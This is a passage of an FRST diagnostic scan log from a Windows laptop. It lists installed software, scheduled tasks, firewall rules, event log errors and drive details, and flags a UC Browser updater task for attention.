Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Movie Maker (HKLM-x32\...\{45898170-E68C-4F02-AA35-C2186BF347A3}) (Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{B39A6825-EA20-43EA-AB2D-A6BC0298D9A1}) (Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Mozilla Firefox 40.0.3 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 40.0.3 (x86 en-US)) (Version: 40.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 40.0.3 - Mozilla)
Mystery P.I. - Curious Case of Counterfeit Cove (HKLM-x32\...\WTA-c2cfafbe-4ca2-4be5-80eb-feac17908e28) (Version: 2.2.0.98 - WildTangent) Hidden
Opera Stable 48.0.2685.39 (HKLM-x32\...\Opera 48.0.2685.39) (Version: 48.0.2685.39 - Opera Software)
Outils de vérification linguistique 2013 de Microsoft Office - Français (HKLM-x32\...\{90150000-001F-040C-0000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation) Hidden
Peggle Nights (HKLM-x32\...\WTA-51104e8b-419d-4661-a1d7-2ac84b9a7931) (Version: 2.2.0.98 - WildTangent) Hidden
Penguins! (HKLM-x32\...\WTA-0eb7a9d1-0bd7-4297-8595-2442d002c333) (Version: 2.2.0.98 - WildTangent) Hidden
Pinger (HKLM-x32\...\{9B56B031-A6C0-4BB7-8F61-938548C1B759}) (Version: 1.4.0.1 - Pinger Inc.) Hidden
Pinger (HKLM-x32\...\Pinger 1.4.0.1) (Version: 1.4.0.1 - Pinger Inc.)
Plants vs. Zombies - Game of the Year (HKLM-x32\...\WTA-eb607eec-616d-47d6-9067-4ce2b4f63207) (Version: 2.2.0.98 - WildTangent) Hidden
Polar Bowler (HKLM-x32\...\WTA-ca882f22-ffce-4139-89bd-db4f9771e198) (Version: 2.2.0.97 - WildTangent) Hidden
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.29075 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller All-In-One Windows Driver (HKLM-x32\...\{F7E7F0CB-AA41-4D5A-B6F2-8E6738EB063F}) (Version: 8.24.1218.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7156 - Realtek Semiconductor Corp.)
REALTEK Wireless LAN Driver (HKLM-x32\...\{A5107464-AA9B-4177-8129-5FF2F42DD322}) (Version: 1.00.13.1216 - REALTEK Semiconductor Corp.)
Roads of Rome 3 (HKLM-x32\...\WTA-1dba3fbf-1ffa-49b0-8493-c2fb6d845670) (Version: 2.2.0.98 - WildTangent) Hidden
Speccy (HKLM\...\Speccy) (Version: 1.30 - Piriform)
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 18.0.4.0 - Synaptics Incorporated)
Tales of Lagoona (HKLM-x32\...\WTA-9f3f6591-d18d-4edc-b944-52a2309f311b) (Version: 2.2.0.110 - WildTangent) Hidden
TeraCopy 2.27 (HKLM\...\TeraCopy_is1) (Version:  - Code Sector)
UC Browser (HKLM-x32\...\UCBrowser) (Version: 5.2.1369.1410 - UCWeb Inc.)
Update Installer for WildTangent Games App (HKLM-x32\...\{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App) (Version:  - WildTangent) Hidden
USB Disk Storage Format Tool 5.3 (HKLM\...\USB Disk Storage Format Tool_is1) (Version:  - Authorsoft Corporation)
Vacation Quest™ - Australia (HKLM-x32\...\WTA-50a84edc-6d7b-42ef-a96f-c43f761e4026) (Version: 3.0.2.32 - WildTangent) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.6 - VideoLAN)
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent)
WildTangent Games App (HP Games) (HKLM-x32\...\{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-hp) (Version: 4.0.10.15 - WildTangent) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3508.0205 - Microsoft Corporation)
Youda Jewel Shop (HKLM-x32\...\WTA-19b97c33-a9f4-4b41-9fe1-23bbfc2a8f90) (Version: 3.0.2.32 - WildTangent) Hidden
Zuma's Revenge (HKLM-x32\...\WTA-388a67e5-25e7-413f-aa22-b4763a8a2ed7) (Version: 2.2.0.98 - WildTangent) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2010-11-19] (Igor Pavlov)
ContextMenuHandlers1: [CLVDShellExt] -> {3E2A0A32-6E14-4BAD-AA87-BBB6A75EBFF2} => C:\Program Files (x86)\Common Files\CyberLink\ShellExtComponent\CLVDShellExt.dll [2013-10-16] (Cyberlink)
ContextMenuHandlers1: [TeraCopy] -> {A8005AF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt.dll [2011-10-26] ()
ContextMenuHandlers1: [TeraCopyS64] -> {A764EEF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt64.dll [2011-10-26] ()
ContextMenuHandlers2: [CLVDShellExt] -> {3E2A0A32-6E14-4BAD-AA87-BBB6A75EBFF2} => C:\Program Files (x86)\Common Files\CyberLink\ShellExtComponent\CLVDShellExt.dll [2013-10-16] (Cyberlink)
ContextMenuHandlers2: [TeraCopy] -> {A8005AF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt.dll [2011-10-26] ()
ContextMenuHandlers2: [TeraCopyS64] -> {A8005AF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt.dll [2011-10-26] ()
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2010-11-19] (Igor Pavlov)
ContextMenuHandlers4: [TeraCopy] -> {A8005AF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt.dll [2011-10-26] ()
ContextMenuHandlers4: [TeraCopyS64] -> {A764EEF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt64.dll [2011-10-26] ()
ContextMenuHandlers5: [TeraCopy] -> {A8005AF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt.dll [2011-10-26] ()
ContextMenuHandlers5: [TeraCopyS64] -> {A764EEF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt64.dll [2011-10-26] ()
ContextMenuHandlers6: [TeraCopy] -> {A8005AF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt.dll [2011-10-26] ()
ContextMenuHandlers6: [TeraCopyS64] -> {A764EEF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt64.dll [2011-10-26] ()

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {265C3B55-D257-4069-86E9-5176C9653BD8} - System32\Tasks\CLVDLauncher => C:\Program Files (x86)\CyberLink\Power2Go8\CLVDLauncher.exe [2013-03-12] (CyberLink Corp.)
Task: {282BBA58-FB08-4296-9C00-7367AE5F657D} - System32\Tasks\Opera scheduled Autoupdate 1502794694 => C:\Program Files (x86)\Opera\launcher.exe [2017-10-10] (Opera Software)
Task: {33D43503-B402-4F08-BD76-054642F91452} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2016-12-07] (HP Inc.)
Task: {3F6E048D-6404-433B-8F5F-CFF4D89BF89E} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => %windir%\system32\rundll32.exe generaltel.dll,RunTelemetryW
Task: {4F71697F-13D7-470D-AF25-92B5590AC54C} - System32\Tasks\UCBrowserUpdater{e23df38b34103b001ee4a910a2610d11} => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2015-06-25] (UCWeb Inc) <==== ATTENTION
Task: {517EB82D-1AF1-4F98-B0C7-7627C442FC36} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2014-01-13] (Hewlett-Packard Company)
Task: {589AACA5-8971-4F35-9AF5-C47132E47FBA} - System32\Tasks\HPCeeScheduleForVEEVIC => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15] (Hewlett-Packard)
Task: {59E206AF-91CE-4151-8263-3A5BFD8AB987} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-15] (Google Inc.)
Task: {5F9CED9F-B5C5-40D9-A7BA-9E1FA04D22EE} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation)
Task: {62CE07BC-82A6-4FDD-A054-25670BF53DDB} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2013-12-13] (Synaptics Incorporated)
Task: {790D64F4-9BF9-4F04-BFAE-7CF7581D4050} - System32\Tasks\CLMLSvc_P2G8 => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [2013-08-05] (CyberLink)
Task: {7BAE9E83-CCF1-489F-84DF-9D4A0D465579} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation)
Task: {7BB4F040-CB53-4235-9CD5-83F02679CE43} - System32\Tasks\RunSpeccy => C:\Program Files\Speccy\Speccy64.exe [2016-11-18] (Piriform Ltd)
Task: {824038DD-7E90-4EB0-B296-EC40F919D08C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2014-01-13] (Hewlett-Packard Company)
Task: {8344F1BA-3DA3-4E06-8252-47A1A8B4677F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-15] (Google Inc.)
Task: {8612EE67-D52F-44A5-A719-D8B7217ABB53} - System32\Tasks\YCMServiceAgent => C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe [2014-03-07] (CyberLink Corp.)
Task: {AFDEF45A-8C35-450B-BF04-142AFAD9F530} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe
Task: {AFF076E1-F9E6-442B-8EAB-3A381C16EAD0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPSFReport.exe [2016-02-18] (Hewlett-Packard)
Task: {B061312A-CEA3-4E5F-B127-E5C99E45C105} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [2017-09-15] (HP Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\HPCeeScheduleForVEEVIC.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
Task: C:\WINDOWS\Tasks\UCBrowserUpdater{e23df38b34103b001ee4a910a2610d11}.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== ATTENTION

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


==================== Loaded Modules (Whitelisted) ==============

2015-07-10 12:00 - 2015-07-10 12:00 - 000032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2014-03-28 21:31 - 2014-03-28 21:31 - 002110464 _____ () C:\Program Files\Hewlett-Packard\SimplePass\autheng.dll
2014-03-28 21:27 - 2014-03-28 21:27 - 000035328 _____ () C:\Program Files\Hewlett-Packard\SimplePass\ssplogon.dll
2014-03-28 21:27 - 2014-03-28 21:27 - 000021504 _____ () C:\Program Files\Hewlett-Packard\SimplePass\cryptodll.dll
2014-03-28 21:27 - 2014-03-28 21:27 - 000055296 _____ () C:\Program Files\Hewlett-Packard\SimplePass\RandomPass.dll
2014-03-28 21:48 - 2014-03-28 21:48 - 000367504 _____ () C:\Program Files\Hewlett-Packard\SimplePass\mstrpwd.dll
2014-03-28 21:48 - 2014-03-28 21:48 - 000712080 _____ () C:\Program Files\Hewlett-Packard\SimplePass\GraphicalPwd.dll
2015-07-10 11:59 - 2015-07-10 11:59 - 000403968 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2017-08-15 12:02 - 2015-06-25 13:14 - 000713552 _____ () C:\Program Files (x86)\UCBrowser\Application\UCService.exe
2017-09-16 14:29 - 2014-09-11 02:29 - 000236544 _____ () C:\app\Veevic\product\12.1.0\dbhome_1\bin\orawsec12.dll
2017-09-16 14:38 - 2014-09-11 02:27 - 000208896 _____ () c:\app\veevic\product\12.1.0\dbhome_1\bin\OraVSSW.exe
2015-07-10 12:00 - 2015-07-10 12:00 - 002498296 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2012-10-01 20:34 - 2012-10-01 20:34 - 006522480 _____ () C:\Program Files\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2017-08-15 12:01 - 2011-10-26 17:41 - 000318976 _____ () C:\Program Files\TeraCopy\TeraCopyExt64.dll
2015-07-10 11:59 - 2015-07-10 11:59 - 000429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-07-10 12:00 - 2015-07-10 14:14 - 006579712 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-07-10 12:00 - 2015-07-10 14:14 - 000471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-07-10 12:00 - 2015-07-10 14:14 - 002274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2014-03-28 21:36 - 2014-03-28 21:36 - 000065024 _____ () C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe
2013-08-10 07:11 - 2013-08-10 07:11 - 000607744 _____ () C:\WINDOWS\system32\spool\DRIVERS\x64\3\JobCapsA.DLL
2014-06-09 06:37 - 2013-08-05 08:49 - 000627672 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMediaLibrary.dll
2013-08-05 23:48 - 2013-08-05 23:48 - 000016856 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 14:25 - 2013-08-22 14:25 - 000000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-133669981-2456230652-2001851347-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\VEEVIC\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: 192.168.43.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{50388594-55C5-4943-9124-8F6DC7DDE47D}] => (Allow) C:\Program Files (x86)\Opera\42.0.2393.137\opera.exe
FirewallRules: [{A7FCD548-EBE4-40E1-B0FC-63310CF96E5F}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{A47441DD-55B5-48CE-B26D-B0492CC03787}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{FAC401B5-357D-4BD7-86F5-31AA49D77C3D}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{7A79A445-09D2-48D0-86DE-F00F9D1A836C}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{CBF5125D-8C2A-4F5C-9159-85795B137B14}] => (Allow) C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe
FirewallRules: [{5FC983BB-1D7A-4389-9B99-E882AD4B15DE}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{8E7A2A89-CC3C-4F95-BEE1-5DCA64FDD1F0}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{CEFB8085-0807-4D85-94F6-8660C6FF8A4F}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{807E93B1-92C0-477A-B06D-47C188DED5E0}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD.exe
FirewallRules: [{F7386F72-6ECE-4396-AF34-9D7832C4D9CA}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12ML.exe
FirewallRules: [{AEB2D8E7-AADB-44C0-8B63-1CCC62641F8C}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12Agent.exe
FirewallRules: [{DA38251A-2140-49CC-830A-5502BEA4026D}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe
FirewallRules: [{18E0C272-1885-405A-8BF8-7714CA6E305E}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMR\PowerDVD12DMREngine.exe
FirewallRules: [{192CB29A-3452-4ADA-B927-A65A53763636}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12.exe
FirewallRules: [{4A32C5EF-091A-49BE-B2A3-0FC7E9FB3943}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{3F62D227-8D97-49AF-8968-D0F2F7AD91CB}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{B217C35C-A1AA-4A26-9137-2CDB11EECC48}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{9123095D-D294-47F6-A81A-FB48B206FEA5}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{07B53F67-46E0-4E8A-A484-DAFDA9505FCA}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{2463C116-69ED-4493-B48B-6631FEF17770}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{819306FA-D122-44F5-A748-CC1307C44A50}] => (Allow) LPort=1900
FirewallRules: [{F82BB814-FD51-4987-A33F-250BD832B780}] => (Allow) LPort=2869
FirewallRules: [{48E95D83-9B8B-414B-A9A7-2AFD0BA50208}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [TCP Query User{87DC3BC2-E08F-47AC-B55E-6E05A2338D2D}C:\users\veevic\appdata\local\temp\orainstall2017-09-16_02-13-11pm\jdk\jre\bin\javaw.exe] => (Allow) C:\users\veevic\appdata\local\temp\orainstall2017-09-16_02-13-11pm\jdk\jre\bin\javaw.exe
FirewallRules: [UDP Query User{D50D1D10-FCE4-4A73-B382-E287B339BBD6}C:\users\veevic\appdata\local\temp\orainstall2017-09-16_02-13-11pm\jdk\jre\bin\javaw.exe] => (Allow) C:\users\veevic\appdata\local\temp\orainstall2017-09-16_02-13-11pm\jdk\jre\bin\javaw.exe
FirewallRules: [TCP Query User{C5D48360-82B7-45E6-8C6A-B1D7DBA2F44F}C:\app\veevic\product\12.1.0\dbhome_1\jdk\jre\bin\java.exe] => (Allow) C:\app\veevic\product\12.1.0\dbhome_1\jdk\jre\bin\java.exe
FirewallRules: [UDP Query User{BD719DFB-4956-4AC1-8A85-487F1EB27A65}C:\app\veevic\product\12.1.0\dbhome_1\jdk\jre\bin\java.exe] => (Allow) C:\app\veevic\product\12.1.0\dbhome_1\jdk\jre\bin\java.exe
FirewallRules: [{F6ED83BC-6104-4C93-AD5D-53A204D47E53}] => (Allow) C:\Program Files (x86)\Opera\48.0.2685.39\opera.exe

==================== Restore Points =========================

29-09-2017 23:10:36 Removed KB4023057
10-10-2017 20:46:07 Scheduled Checkpoint
22-10-2017 02:35:17 Scheduled Checkpoint
22-10-2017 02:58:38 Restore Point Created by FRST

==================== Faulty Device Manager Devices =============

Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: HID-compliant touch screen
Description: HID-compliant touch screen
Class Guid: {745a17a0-74d3-11d0-b6fe-00a0c90f57da}
Manufacturer: (Standard system devices)
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Event log errors: =========================

Application errors:
==================
Error: (10/22/2017 03:02:45 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine RegOpenKeyExW(-2147483646,SYSTEM\CurrentControlSet\Services\VSS\Diag,...).  hr = 0x80070005, Access is denied.
.


Operation:
   Initializing Writer

Context:
   Writer Class Id: {26d02976-b909-43ad-af7e-62a4f625e372}
   Writer Name: Oracle VSS Writer - ORCL
   Writer Instance Name: ORCL
   Writer Instance ID: {9852f499-0540-439c-af32-c8fd75d04aa6}

Error: (10/22/2017 03:02:40 AM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1500) (User: VICTOR)
Description: Windows cannot log you on because your profile cannot be loaded. Check that you are connected to the network, and that your network is functioning correctly.

 DETAIL - The system cannot find the file specified.

Error: (10/22/2017 03:02:40 AM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1511) (User: VICTOR)
Description: Windows cannot find the local profile and is logging you on with a temporary profile. Changes you make to this profile will be lost when you log off.

Error: (10/22/2017 03:02:40 AM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1500) (User: VICTOR)
Description: Windows cannot log you on because your profile cannot be loaded. Check that you are connected to the network, and that your network is functioning correctly.

 DETAIL - The system cannot find the file specified.

Error: (10/22/2017 03:02:40 AM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1511) (User: VICTOR)
Description: Windows cannot find the local profile and is logging you on with a temporary profile. Changes you make to this profile will be lost when you log off.

Error: (10/22/2017 03:02:40 AM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1500) (User: VICTOR)
Description: Windows cannot log you on because your profile cannot be loaded. Check that you are connected to the network, and that your network is functioning correctly.

 DETAIL - The system cannot find the file specified.

Error: (10/22/2017 03:02:40 AM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1511) (User: VICTOR)
Description: Windows cannot find the local profile and is logging you on with a temporary profile. Changes you make to this profile will be lost when you log off.

Error: (10/22/2017 03:02:40 AM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1500) (User: VICTOR)
Description: Windows cannot log you on because your profile cannot be loaded. Check that you are connected to the network, and that your network is functioning correctly.

 DETAIL - The system cannot find the file specified.

Error: (10/22/2017 03:02:40 AM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1511) (User: VICTOR)
Description: Windows cannot find the local profile and is logging you on with a temporary profile. Changes you make to this profile will be lost when you log off.

Error: (10/22/2017 02:58:39 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.


System errors:
=============
Error: (10/22/2017 03:06:09 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {784E29F4-5EBE-4279-9948-1E8FE941646D} did not register with DCOM within the required timeout.

Error: (10/22/2017 03:02:40 AM) (Source: Service Control Manager) (EventID: 7005) (User: )
Description: The LoadUserProfile call failed with the following error:
The system cannot find the file specified.

Error: (10/22/2017 03:02:40 AM) (Source: Service Control Manager) (EventID: 7005) (User: )
Description: The LoadUserProfile call failed with the following error:
The system cannot find the file specified.

Error: (10/22/2017 03:02:40 AM) (Source: Service Control Manager) (EventID: 7005) (User: )
Description: The LoadUserProfile call failed with the following error:
The system cannot find the file specified.

Error: (10/22/2017 03:02:40 AM) (Source: Service Control Manager) (EventID: 7005) (User: )
Description: The LoadUserProfile call failed with the following error:
The system cannot find the file specified.

Error: (10/22/2017 03:01:46 AM) (Source: Service Control Manager) (EventID: 7043) (User: )
Description: The Delivery Optimization service did not shut down properly after receiving a preshutdown control.

Error: (10/22/2017 03:00:40 AM) (Source: Service Control Manager) (EventID: 7043) (User: )
Description: The Diagnostics Tracking Service service did not shut down properly after receiving a preshutdown control.

Error: (10/22/2017 03:00:07 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_Session1 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (10/22/2017 02:58:53 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The OracleServiceORCL service terminated unexpectedly.  It has done this 1 time(s).

Error: (10/22/2017 02:58:52 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The HP Software Framework Service service terminated unexpectedly.  It has done this 1 time(s).


CodeIntegrity:
===================================
  Date: 2017-10-21 16:01:41.240
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-09-16 15:23:08.576
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-09-10 05:05:48.193
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Memory info ===========================

Processor: Intel® Core™ i3-4010U CPU @ 1.70GHz
Percentage of memory in use: 55%
Total physical RAM: 4027.84 MB
Available physical RAM: 1792.02 MB
Total Virtual: 4731.84 MB
Available Virtual: 1809.93 MB

==================== Drives ================================

Drive c: (Windows) (Fixed) (Total:444.39 GB) (Free:182.83 GB) NTFS
Drive d: (RECOVERY) (Fixed) (Total:19.87 GB) (Free:1.94 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive f: (UNILORIN) (CDROM) (Total:0.76 GB) (Free:0 GB) CDFS
Drive g: (VEEVIC) (Removable) (Total:6.72 GB) (Free:6.72 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 57DF2823)

Partition: GPT.

========================================================
